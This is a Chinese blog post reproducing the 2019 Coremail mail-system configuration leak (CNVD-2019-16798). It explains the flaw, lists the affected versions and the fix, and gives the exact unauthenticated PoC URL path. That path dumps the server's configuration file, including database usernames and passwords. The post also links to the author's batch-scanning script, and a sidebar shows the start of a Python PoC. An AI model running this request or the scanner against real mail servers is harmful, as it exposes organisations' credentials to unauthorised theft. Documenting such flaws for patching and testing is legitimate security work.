Coremail-0day敏感文件泄露漏洞送附批量检测脚本

最新推荐文章于 2024-07-04 17:48:05 发布
最新推荐文章于 2024-07-04 17:48:05 发布
阅读量1.9w 收藏 7
点赞数 4
分类专栏: WEB 漏洞复现和分析 文章标签: 漏洞 0day coremail
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/92735189
版权

漏洞介绍

Coremail邮件系统是业内唯一一款商用的超大规模运营级邮件系统,开始研发于1999年 [1] ,其前身为中国第一套中文电子邮件系统163\126,目前在中国的客户包括网易系列邮箱、中国移动手机邮箱(139)等国内领先的邮箱服务运营商,以及宝钢、首钢、南方电网、农业银行、交通银行、华润、神华、华能等世界500强中国企业,截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户 [2] ,已成为中国用户实际使用最广泛的电子邮件系统。

2019年5月22日,国家信息安全漏洞共享平台(CNVD)收录了由北京天融信网络安全技术有限公司报送的Coremail邮件系统信息泄露漏洞(CNVD-2019-16798)。
由于Coremail邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知Coremail服务器的系统配置文件,造成数据库连接参数等系统敏感配置信息泄露。

**
泄露页:
在这里插入图片描述

POC:

/mailsms/s?func=ADMIN:appState&dumpConfig=/

**
利用方式:

域名/IP等地址+POC

即可获取目标邮件服务器配置文件
配置文件包括:文件路径、IP、端口、数据库用户、密码等敏感信息。

**
在这里插入图片描述
使用方法如下
在这里插入图片描述
影响范围
Coremail XT 3.0.1至XT 5.0.9版本,XT 5.0.9a及以上版本已修复该漏洞。

批量测试脚本

自己写的简单脚本,大神勿喷,有意见我尽量改
**

请勿用于非法扫描!

**
链接:https://pan.baidu.com/s/12N_2uJ4w7z_M3d-RZ8tN8Q
提取码:n0xx

god_Zeo
关注
专栏目录
Coremail邮件系统存在配置信息泄露漏洞CNVD-2019-16798
墨痕诉清风的博客
11-09 7781
目前,论客公司已发布补丁进行修复,针对Coremail XT5和Coremail XT3/CM5版本,补丁编号为CMXT5-2019-0002,程序版本1.1.0-alphabuild20190524(3813d273)。综合CNVD技术支撑单位报、白帽子报CNVD秘书处主动探测的结果显示,我国境内共有1484台服务器受此漏洞影响,影响比例约为4.0%。邮件系统的mailsms模块的参数大小写敏感存在缺陷,使得攻击者利用该漏洞,在未授权的情况下,通过远程访问URL地址获知。...
Coremail与国家信息安全漏洞库(CNNVD)达成深度合作!
CACTER_S的博客
11-06 195
Coremail在安全研究技术和漏洞挖掘技术的实力得到了国家权威机构的认可!
探索CoreMailUploadRce:一款强大的邮件上传漏洞利用工具
gitblog_00064的博客
03-30 521
探索CoreMailUploadRce:一款强大的邮件上传漏洞利用工具 项目地址:https://gitcode.com/jimoyong/CoreMailUploadRce 项目简介 CoreMailUploadRce 是一个开源项目,由开发者Jimoyong开发并维护。它主要是一款针对Coremail邮件系统上传功能的漏洞利用工具。通过此工具,安全研究人员和渗透测试员能够模拟攻击场景,以检测...
漏洞复现】Emlog Pro 2.3.4——任意用户登入、会话持久化(CVE-2024-5044)
最新发布
LongL_GuYu的博客
07-04 649
Emlog Pro 2.3.4存在任意用户登入、会话持久化漏洞
Coremail 远程命令执行漏洞
Jdjdjjdjdjdje的博客
08-22 3575
OSCS 是国内首个开源软件供应链安全社区,社区联合开发者帮助全球顶级开源项目解决安全问题,并提供实时的安全漏洞情报,同时提供专业的代码安全检测工具为开发者免费使用。社区开发者可以通过配置飞书、钉钉、企业微信机器人获取一手的情报。在 Coremail XT5/XT6 版本中,邮件处理功能存在溢出风险,攻击者构造恶意邮件,向任意邮箱地址发该恶意邮件,当服务器处理邮件时,会触发漏洞,造成任意命令执行等危害。官方公告认为该漏洞不能稳定复现,在实际场景中难以利用,危害有限。
关于coremail0day
谁的博客
06-14 3555
#-- Coding: utf-8 -- #Author: Vulkey_Chen #Email: gh0stkey@hi-ourlife.com #Website: www.hi-ourlife.com #About: mailsms config dump PoC import requests,sys def mailsmsPoC(url): url = url + “/mailsms/s?...
Coremail邮件系统配置文件泄露漏洞
weixin_30682415的博客
06-16 2820
Coremail论客邮件系统开始研发于1999年,是中国第一套中文邮件系统,目前在中国大陆地区拥有超过10亿终端用户,是网易、中华网等运营商至今一直使用的邮件系统,也是政府、事业单位、科教、企业等机构广泛使用的邮件系统。 2019年6月,网上流传出Coremail论客邮件系统配置文件泄露漏洞,该漏洞无需认证即可获取邮件系统的配置文件内容。 Coremail官网发布的漏洞公告:《关于Corem...
coremail漏洞_Coremail多个安全漏洞预警
weixin_30880565的博客
01-30 4057
1.安全公告2019年6月14,Coremail发布了3个高危漏洞的安全公告,补丁编号:CMXT5-2019-0001,涉及模块apiws,补丁修复IP限制不合理和存在路径遍历的漏洞;补丁编号:CMXT5-2019-0002,涉及模块mailsms,补丁修复信息泄露漏洞;补丁编号:CMXT5-2019-0003,涉及模块wmsvr,补丁修复信息泄露漏洞、反射型XSS、路径遍历、...
Coremail-Plugin(4.2.4.15).zip
07-10
Coremail官网已无法下载本插件,产品诞生于1999年,经过十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。截止2010年,Coremail邮件系统产品在国内已拥有超过3亿终端用户,是目前...
Coremail-PC(4.0.0.862)_20200507.exe
12-06
Coremail-PC
Coremail-Plugin(4.2.3.1)
12-05
Coremail产品诞生于1999年,经过十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。截止2010年,Coremail邮件系统产品在国内已拥有超过3亿终端用户,是目前国内拥有邮箱使用用户...
Coremail-Plugin(4.2.4.15).exe
08-31
Coremail Outlook Plugin是一款为Outlook、Foxmail等常用客户端同步企业通讯录的有力工具,采用Coremail邮件系统的企业用户通过安装本软件,可将企业通讯录完整组织架构导入客户端中,使企业员工通信更加方便高效。
Coremail接口存配置读取漏洞POC
热门推荐
Sylon的博客
06-14 1万+
Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。 截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、...
Apache Tomcat被曝存安全隐患,Coremail提醒您尽快加固
Coremail论客
02-25 1731
近日,CNVD(国家信息安全漏洞共享平台)公告Apache Tomcat被曝存在文件包含漏洞。由于Tomcat AJP协议存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若服务器端同时存在文件上传功能,攻击者可进一步实现远程代码的执行,威胁企业信息安全。 Tomcat 作为目前较为流行的 Web 应用服务器,应用范围较广,威胁影响较大。据...
mail敏感配置信息泄露
天行健,君子以自强不息
07-28 2087
生活是美好的,生命在其间又是如此短促。既然活着,就应该好好地活。应该更珍惜自己生命的每个时刻,精神上的消沉无异于自杀。像往日一样正常的投入生活吧,即便是痛苦,也应该被看做是人的正常情感,甚至它是组成我们幸福生活的一个不可缺欠的部分。
1.漏洞的危害
my的博客
10-22 137
危害:不需要密码登录。
Outlook 漏洞链可导致零点击 RCE
smellycat000的专栏
12-21 162
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Akamai 公司的安全研究员分享了如何绕过微软 Outlook 零点击 RCE 漏洞补丁的详情。该漏洞编号为CVE-2023-23397,由微软在2023年3月修复,当时该漏洞已被俄罗斯国家黑客组织利用一年左右。未认证攻击者可发包含非恶意通知链接的邮件提醒,诱骗 Outlook 客户端连接到受害者的服务器,导致 Net-NTLMv2 哈希被发...
被动扫描工具(myscan)
lza20001103的博客
08-29 1772
被动扫描工具(myscan) 文章目录被动扫描工具(myscan)前言运行原理演示地址如何运行检测插件优势与不足 前言 myscan是参考awvs的poc目录架构,pocsuite3、sqlmap等代码框架,以及搜集互联网上大量的poc,由python3开发而成的被动扫描工具。 此项目源自个人开发项目,结合个人对web渗透,常见漏洞原理和检测的代码实现,通用poc的搜集,被动扫描器设计,以及信息搜集等思考实践。 运行原理 myscan依赖burpsuite和redis,需启动redis和burpsuite插
python爬虫检索163邮箱用户名是否可用
Hadson进击之路
12-16 478
项目描述: 给一个用户名文件,从文件中读取所有用户名,然后判断用户名是否能够注册163邮箱,最后将是否可用输出到文件。 解决思路: 163邮箱在检测用户名是否可用时,会发起一个get请求到服务器,返回一个字符串,字符串中包括此用户名可以注册哪几个后缀的邮箱。 模拟get请求的URL,解析返回字符串,判断是否可以注册163邮箱。 import requests NAMEFILE = '...
/home/coremail/bin/sautil chkver --withC 的命令有什么用
05-24
`/home/coremail/bin/sautil chkver --withC` 命令的作用是检查当前安装的反垃圾软件 SpamAssassin 是否启用了 C 语言插件,如果启用了,则会输出一些相关信息。 SpamAssassin 是一款用于检测和过滤垃圾邮件的开源软件,它支持插件机制,其中 C 语言插件可以提高 SpamAssassin 的性能。使用 `--withC` 选项可以检查 SpamAssassin 是否启用了 C 语言插件。如果没有启用,可以通过修改相关配置文件来启用插件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值